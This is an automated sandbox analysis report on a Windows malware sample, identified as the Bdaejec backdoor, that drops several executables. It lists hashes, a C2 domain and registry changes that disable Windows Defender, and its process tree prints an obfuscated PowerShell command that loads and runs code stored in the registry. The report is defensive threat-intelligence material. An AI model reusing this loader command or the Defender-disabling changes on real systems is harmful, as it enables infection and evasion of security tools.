Analysis
-
max time kernel
150s -
max time network
61s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
15-11-2024 02:03
Static task
static1
Behavioral task
behavioral1
Sample
c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe
Resource
win10v2004-20241007-en
General
-
Target
c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe
-
Size
1013KB
-
MD5
84138dffdbd652ba89baed49cc815b6a
-
SHA1
841af40691b900f06217dc0b0af28d4fef0245a4
-
SHA256
c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e
-
SHA512
9aff34103afc917c1e1fbef62a4639a2a6249a295bc05e0fb812d1f64821e3929142a5b51c626aca66668bda9a05a08c8ea037c5b56c298eaf3e424916c20b1b
-
SSDEEP
24576:BgVo+DZba0sLgKNCAZlcLMP8VoapQrUDz/JOop+mHDTOe51K:So+DKtCAZlzPYeUxO2hKez
Malware Config
Extracted
bdaejec
ddos.dnsnb8.net
Signatures
-
Bdaejec family
-
Detects Bdaejec Backdoor. 2 IoCs
Bdaejec is backdoor written in C++.
Processes:
resource yara_rule behavioral1/memory/2288-31-0x00000000009E0000-0x00000000009E9000-memory.dmp family_bdaejec_backdoor behavioral1/memory/2288-741-0x00000000009E0000-0x00000000009E9000-memory.dmp family_bdaejec_backdoor -
Modifies security service 2 TTPs 6 IoCs
Processes:
svchost.exedControl.exeservices.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" dControl.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "2" dControl.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" services.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "2" services.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 1972 created 424 1972 powershell.EXE winlogon.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.EXEpid process 2508 powershell.exe 2540 powershell.exe 1972 powershell.EXE -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\KktXMQ.exe aspack_v212_v242 -
Executes dropped EXE 7 IoCs
Processes:
dControl.exewww.rotkit.exewww.XClient.exeKktXMQ.exedControl.exedControl.exedControl.exepid process 2168 dControl.exe 1644 www.rotkit.exe 2864 www.XClient.exe 2288 KktXMQ.exe 268 dControl.exe 1176 dControl.exe 972 dControl.exe -
Loads dropped DLL 2 IoCs
Processes:
www.rotkit.exepid process 1644 www.rotkit.exe 1644 www.rotkit.exe -
Processes:
dControl.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\DisableAntiSpyware = "1" dControl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\DisableAntiVirus = "1" dControl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection dControl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" dControl.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 8 ip-api.com -
AutoIT Executable 5 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral1/memory/2168-56-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe behavioral1/memory/1176-86-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe behavioral1/memory/268-85-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe behavioral1/memory/972-461-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe behavioral1/memory/1176-467-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe -
Drops file in System32 directory 4 IoCs
Processes:
dControl.exepowershell.EXEdescription ioc process File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol dControl.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini dControl.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol dControl.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 1972 set thread context of 2528 1972 powershell.EXE dllhost.exe -
Processes:
resource yara_rule C:\Users\Public\dControl.exe upx behavioral1/memory/2168-9-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral1/memory/268-54-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral1/memory/2168-56-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral1/memory/1176-86-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral1/memory/268-85-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral1/memory/972-438-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral1/memory/972-461-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral1/memory/1176-467-0x0000000000400000-0x00000000004CD000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
Processes:
KktXMQ.exedescription ioc process File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmiregistry.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jre7\bin\jabswitch.exe KktXMQ.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\CNFNOT32.EXE KktXMQ.exe File opened for modification C:\Program Files\Java\jre7\bin\kinit.exe KktXMQ.exe File opened for modification C:\Program Files\Mozilla Firefox\uninstall\helper.exe KktXMQ.exe File opened for modification C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\106.0.5249.119\chrome_installer.exe KktXMQ.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\NAMECONTROLSERVER.EXE KktXMQ.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\idlj.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstat.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\unpack200.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaws.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jre7\bin\javaw.exe KktXMQ.exe File opened for modification C:\Program Files\Microsoft Games\Purble Place\PurblePlace.exe KktXMQ.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MSOHTMED.EXE KktXMQ.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe KktXMQ.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome_pwa_launcher.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\java-rmi.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\servertool.exe KktXMQ.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\WORDICON.EXE KktXMQ.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javac.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jre7\bin\orbd.exe KktXMQ.exe File opened for modification C:\Program Files\Windows Defender\MSASCui.exe KktXMQ.exe File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Checkers\chkrzm.exe KktXMQ.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateComRegisterShell64.exe KktXMQ.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\GROOVEMN.EXE KktXMQ.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\orbd.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\unpack200.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jre7\bin\javacpl.exe KktXMQ.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSQRY32.EXE KktXMQ.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\extcheck.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jvisualvm.exe KktXMQ.exe File opened for modification C:\Program Files\Mozilla Firefox\minidump-analyzer.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\native2ascii.exe KktXMQ.exe File opened for modification C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe KktXMQ.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdate.exe KktXMQ.exe File opened for modification C:\Program Files\Google\Chrome\Application\chrome_proxy.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jcmd.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jdb.exe KktXMQ.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSTORE.EXE KktXMQ.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\policytool.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\policytool.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jre7\bin\keytool.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaw.exe KktXMQ.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe KktXMQ.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\reader_sl.exe KktXMQ.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE KktXMQ.exe File opened for modification C:\Program Files\7-Zip\7z.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javaw.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\serialver.exe KktXMQ.exe File opened for modification C:\Program Files (x86)\Windows Mail\WinMail.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\wsgen.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jre7\bin\policytool.exe KktXMQ.exe File opened for modification C:\Program Files\Microsoft Games\Minesweeper\MineSweeper.exe KktXMQ.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\java.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jrunscript.exe KktXMQ.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe KktXMQ.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleCrashHandler.exe KktXMQ.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\GROOVE.EXE KktXMQ.exe File opened for modification C:\Program Files\Java\jre7\bin\servertool.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jre7\bin\unpack200.exe KktXMQ.exe File opened for modification C:\Program Files\Windows Mail\wabmig.exe KktXMQ.exe File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Spades\shvlzm.exe KktXMQ.exe -
Drops file in Windows directory 1 IoCs
Processes:
makecab.exedescription ioc process File created C:\Windows\Logs\CBS\CbsPersist_20241115020355.cab makecab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
KktXMQ.exewww.XClient.exedControl.exedControl.exedControl.exedControl.exepowershell.exepowershell.exewww.rotkit.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language KktXMQ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language www.XClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language www.rotkit.exe -
Modifies data under HKEY_USERS 10 IoCs
Processes:
svchost.exepowershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 6043efa10237db01 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
dControl.exedControl.exedControl.exepowershell.EXEdControl.exepowershell.exedllhost.exepowershell.exepid process 2168 dControl.exe 2168 dControl.exe 2168 dControl.exe 268 dControl.exe 268 dControl.exe 268 dControl.exe 1176 dControl.exe 1972 powershell.EXE 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 972 dControl.exe 972 dControl.exe 972 dControl.exe 2508 powershell.exe 1972 powershell.EXE 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2540 powershell.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
dControl.exepid process 1176 dControl.exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
Processes:
dControl.exedControl.exewww.XClient.exepowershell.EXEdControl.exepowershell.exedllhost.exepowershell.exedescription pid process Token: SeDebugPrivilege 2168 dControl.exe Token: SeAssignPrimaryTokenPrivilege 2168 dControl.exe Token: SeIncreaseQuotaPrivilege 2168 dControl.exe Token: 0 2168 dControl.exe Token: SeDebugPrivilege 268 dControl.exe Token: SeAssignPrimaryTokenPrivilege 268 dControl.exe Token: SeIncreaseQuotaPrivilege 268 dControl.exe Token: SeDebugPrivilege 2864 www.XClient.exe Token: SeDebugPrivilege 1972 powershell.EXE Token: SeDebugPrivilege 1176 dControl.exe Token: SeAssignPrimaryTokenPrivilege 1176 dControl.exe Token: SeIncreaseQuotaPrivilege 1176 dControl.exe Token: 0 1176 dControl.exe Token: SeDebugPrivilege 1972 powershell.EXE Token: SeDebugPrivilege 2508 powershell.exe Token: SeDebugPrivilege 2528 dllhost.exe Token: SeDebugPrivilege 2540 powershell.exe -
Suspicious use of FindShellTrayWindow 28 IoCs
Processes:
dControl.exepid process 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe -
Suspicious use of SendNotifyMessage 28 IoCs
Processes:
dControl.exepid process 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe 1176 dControl.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exewww.rotkit.exetaskeng.exedControl.exeexplorer.exewww.XClient.exepowershell.EXEdllhost.exedescription pid process target process PID 2376 wrote to memory of 2168 2376 c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe dControl.exe PID 2376 wrote to memory of 2168 2376 c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe dControl.exe PID 2376 wrote to memory of 2168 2376 c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe dControl.exe PID 2376 wrote to memory of 2168 2376 c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe dControl.exe PID 2376 wrote to memory of 1644 2376 c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe www.rotkit.exe PID 2376 wrote to memory of 1644 2376 c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe www.rotkit.exe PID 2376 wrote to memory of 1644 2376 c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe www.rotkit.exe PID 2376 wrote to memory of 1644 2376 c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe www.rotkit.exe PID 1644 wrote to memory of 2288 1644 www.rotkit.exe KktXMQ.exe PID 1644 wrote to memory of 2288 1644 www.rotkit.exe KktXMQ.exe PID 1644 wrote to memory of 2288 1644 www.rotkit.exe KktXMQ.exe PID 1644 wrote to memory of 2288 1644 www.rotkit.exe KktXMQ.exe PID 2376 wrote to memory of 2864 2376 c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe www.XClient.exe PID 2376 wrote to memory of 2864 2376 c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe www.XClient.exe PID 2376 wrote to memory of 2864 2376 c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe www.XClient.exe PID 2376 wrote to memory of 2864 2376 c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe www.XClient.exe PID 3000 wrote to memory of 1972 3000 taskeng.exe powershell.EXE PID 3000 wrote to memory of 1972 3000 taskeng.exe powershell.EXE PID 3000 wrote to memory of 1972 3000 taskeng.exe powershell.EXE PID 1176 wrote to memory of 972 1176 dControl.exe dControl.exe PID 1176 wrote to memory of 972 1176 dControl.exe dControl.exe PID 1176 wrote to memory of 972 1176 dControl.exe dControl.exe PID 1176 wrote to memory of 972 1176 dControl.exe dControl.exe PID 2556 wrote to memory of 1668 2556 explorer.exe MSASCui.exe PID 2556 wrote to memory of 1668 2556 explorer.exe MSASCui.exe PID 2556 wrote to memory of 1668 2556 explorer.exe MSASCui.exe PID 2864 wrote to memory of 2508 2864 www.XClient.exe powershell.exe PID 2864 wrote to memory of 2508 2864 www.XClient.exe powershell.exe PID 2864 wrote to memory of 2508 2864 www.XClient.exe powershell.exe PID 2864 wrote to memory of 2508 2864 www.XClient.exe powershell.exe PID 2864 wrote to memory of 2540 2864 www.XClient.exe powershell.exe PID 2864 wrote to memory of 2540 2864 www.XClient.exe powershell.exe PID 2864 wrote to memory of 2540 2864 www.XClient.exe powershell.exe PID 2864 wrote to memory of 2540 2864 www.XClient.exe powershell.exe PID 1972 wrote to memory of 2528 1972 powershell.EXE dllhost.exe PID 1972 wrote to memory of 2528 1972 powershell.EXE dllhost.exe PID 1972 wrote to memory of 2528 1972 powershell.EXE dllhost.exe PID 1972 wrote to memory of 2528 1972 powershell.EXE dllhost.exe PID 1972 wrote to memory of 2528 1972 powershell.EXE dllhost.exe PID 1972 wrote to memory of 2528 1972 powershell.EXE dllhost.exe PID 1972 wrote to memory of 2528 1972 powershell.EXE dllhost.exe PID 1972 wrote to memory of 2528 1972 powershell.EXE dllhost.exe PID 1972 wrote to memory of 2528 1972 powershell.EXE dllhost.exe PID 2528 wrote to memory of 424 2528 dllhost.exe winlogon.exe PID 2528 wrote to memory of 468 2528 dllhost.exe services.exe PID 2528 wrote to memory of 484 2528 dllhost.exe lsass.exe PID 2528 wrote to memory of 492 2528 dllhost.exe lsm.exe PID 2528 wrote to memory of 608 2528 dllhost.exe svchost.exe PID 2528 wrote to memory of 688 2528 dllhost.exe svchost.exe PID 2528 wrote to memory of 764 2528 dllhost.exe svchost.exe PID 2528 wrote to memory of 828 2528 dllhost.exe svchost.exe PID 2528 wrote to memory of 864 2528 dllhost.exe svchost.exe PID 2528 wrote to memory of 1004 2528 dllhost.exe svchost.exe PID 2528 wrote to memory of 332 2528 dllhost.exe svchost.exe PID 2528 wrote to memory of 392 2528 dllhost.exe spoolsv.exe PID 2528 wrote to memory of 1052 2528 dllhost.exe svchost.exe PID 2528 wrote to memory of 1128 2528 dllhost.exe taskhost.exe PID 2528 wrote to memory of 1220 2528 dllhost.exe Dwm.exe PID 2528 wrote to memory of 1268 2528 dllhost.exe Explorer.EXE PID 2528 wrote to memory of 1696 2528 dllhost.exe DllHost.exe PID 2528 wrote to memory of 1108 2528 dllhost.exe OSPPSVC.EXE PID 2528 wrote to memory of 1924 2528 dllhost.exe wmiprvse.exe PID 2528 wrote to memory of 1196 2528 dllhost.exe svchost.exe PID 2528 wrote to memory of 528 2528 dllhost.exe sppsvc.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:424
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{31642bbe-7e67-41b8-9014-c7577a550918}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2528
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
- Modifies security service
PID:468 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:608
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:1696
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe3⤵PID:1924
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding3⤵
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Program Files\Windows Defender\MSASCui.exe"C:\Program Files\Windows Defender\MSASCui.exe"4⤵PID:1668
-
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding3⤵PID:2884
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:688
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
PID:764
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:828
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1220
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵PID:864
-
C:\Windows\system32\taskeng.exetaskeng.exe {201B4AD9-F82B-46DE-A186-5C4ADBE2EB3B} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](119)+''+[Char](119)+''+[Char](119)+''+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1972
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam3⤵PID:2240
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam3⤵PID:2808
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:1004
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:332
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:392
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1052
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1128
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:1108
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:1196
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:528
-
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe2⤵PID:1156
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241115020355.log C:\Windows\Logs\CBS\CbsPersist_20241115020355.cab3⤵
- Drops file in Windows directory
PID:2912
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k secsvcs2⤵
- Modifies data under HKEY_USERS
PID:2552
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:484
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:492
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1268
-
C:\Users\Admin\AppData\Local\Temp\c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe"C:\Users\Admin\AppData\Local\Temp\c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Users\Public\dControl.exe"C:\Users\Public\dControl.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2168 -
C:\Users\Public\dControl.exeC:\Users\Public\dControl.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:268 -
C:\Users\Public\dControl.exe"C:\Users\Public\dControl.exe" /TI5⤵
- Modifies security service
- Executes dropped EXE
- Windows security modification
